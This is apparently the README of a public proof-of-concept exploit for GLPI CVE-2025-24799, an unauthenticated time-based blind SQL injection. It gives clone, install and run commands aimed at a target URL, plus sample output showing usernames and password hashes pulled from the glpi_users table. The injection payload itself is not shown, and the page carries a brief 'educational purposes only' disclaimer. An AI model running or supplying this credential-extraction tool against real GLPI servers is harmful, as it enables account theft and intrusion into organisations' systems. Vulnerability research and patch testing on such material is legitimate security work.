
Exploits GLPI CVE-2025-24799 via unauthenticated time-based blind SQL injection to extract usernames and password hashes from glpi_users for authorized security testing.
CVE-2025-24799 is a proof-of-concept (PoC) exploit targeting GLPI.
This exploit demonstrates unauthenticated SQL Injection (time-based blind) to extract user credentials.
Disclaimer: This PoC is for educational purposes only. Do not use on systems without permission.
glpi_users table and required columns (name and password)git clone https://github.com/Rosemary1337/CVE-2025-24799.git
cd CVE-2025-24799
pip install -r requirements.txt
Requirements:
requests,colorama,beautifulsoup4
python3 main.py -u <TARGET_URL>
python3 main.py -u http://target.com/index.php/ajax
| Flag | Description | Required | Default |
|---|---|---|---|
-u, --url | Target URL | Yes | - |
The console shows:
[•][✔][✖][i]Example:
[•] Exploiting CVE-2025-24799...
[✔] Table 'glpi_users' found.
[✔] Required columns verified.
[i] Starting credential extraction...
[+] Credential 1: admin:5f4dcc3b5aa765d61d8327deb882cf99
[+] Credential 2: user:123456
[*] Extraction complete.
I'm an active developer who enjoys building tools and sharing knowledge. You can reach me through: